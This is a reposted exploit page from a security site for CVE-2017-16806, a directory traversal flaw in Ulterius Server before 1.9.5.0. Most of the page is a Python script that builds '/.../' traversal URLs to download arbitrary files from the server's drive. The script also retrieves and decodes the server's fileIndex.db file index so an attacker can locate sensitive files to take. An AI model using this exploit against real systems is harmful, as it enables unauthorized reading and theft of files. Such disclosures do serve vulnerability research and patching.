首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ulterius Server < 1.9.5.0 - Directory Traversal
来源:vfocus.net 作者:Osgood 发布时间:2017-11-15  
# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
    # First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
    # filename.length (4 bytes?)
    # filename
    # directory.length (4 bytes?)
    # directory
 
import requests
import sys
import argparse
import zlib
import struct
 
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
    length = struct.unpack('B', data[i])[0]
    length += struct.unpack('B', data[i+1])[0]
    length += struct.unpack('B', data[i+2])[0]
    length += struct.unpack('B', data[i+3])[0]
    
    i += 4
    filename = data[i:i+length]
    i += length
 
    return i, filename
 
# Main function
def main():
    # Parse arguments
    parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
    parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
    parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
    parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
    args = parser.parse_args()
 
        # We are going to retrieve a specified file
    if args.retrieve:
        fileName = str(args.retrieve[0])
        
                # This works for the default Ulterius install directory.
        baseDir = "/.../.../.../.../.../.../.../.../.../"
    
                # Remove slashes from output file name
        outFile = fileName.replace('\\','_')
    
        # Remove drive letter and change slashes
        if ":\\" in fileName[:3]:
            fileName = fileName[3:]
    
                # Replace slashes
        fileName = fileName.replace('\\','/')   # Replace slashes
            
                # Build URL
        url = str(args.url[0]) + baseDir + fileName
        print "Retrieving " + url
        
                # Download file
        r = requests.get(url=url, stream=True)  # Retrieve file
    
                # Write file
        f = open(outFile, 'w')
        f.write(r.content)
    
        # We are going to download the fileIndex.db file
    if args.index:
                # Setup the URL
        url = args.url[0] + "/.../fileIndex.db"
        print "Downloading " + url
 
                # Download file
        r = requests.get(url=url, stream=True)
        
                # decompress the data
                data = zlib.decompress( r.content, -15 )
        
                # Open output file for writing
        f = open('fileIndex.db', 'w')
    
        # Strip off header info (not sure what this is)
        data = data[8:]
        
        # Process file names and write to output file
        i = 0
        while i < len(data):
            i, filename = processChunk(i, data)         # Get file name
            i, directory = processChunk(i, data)        # Get file path
            i += 8 # Skip the FFFFFFFFFFFFFFFF
                f.write(directory + '\\' + filename + '\n') # Write to output file
    
if __name__ == "__main__":
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 7.1.8 - Heap-Based Buffer
·Wireless IP Camera (P2P) WIFIC
·Allworx Server Manager 6x / 6x
·Dup Scout Enterprise 10.0.18 -
·D-Link DIR-850L Unauthenticate
·D-Link DIR605L - Denial of Ser
·IKARUS anti.virus 2.16.7 - 'nt
·Microsoft Edge Object.setProto
·Web Viewer 1.0.0.193 (Samsung
·Microsoft Edge Chakra JIT Type
·Xlight FTP Server 3.8.8.5 - Bu
·Microsoft Edge Charka JIT Inco
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved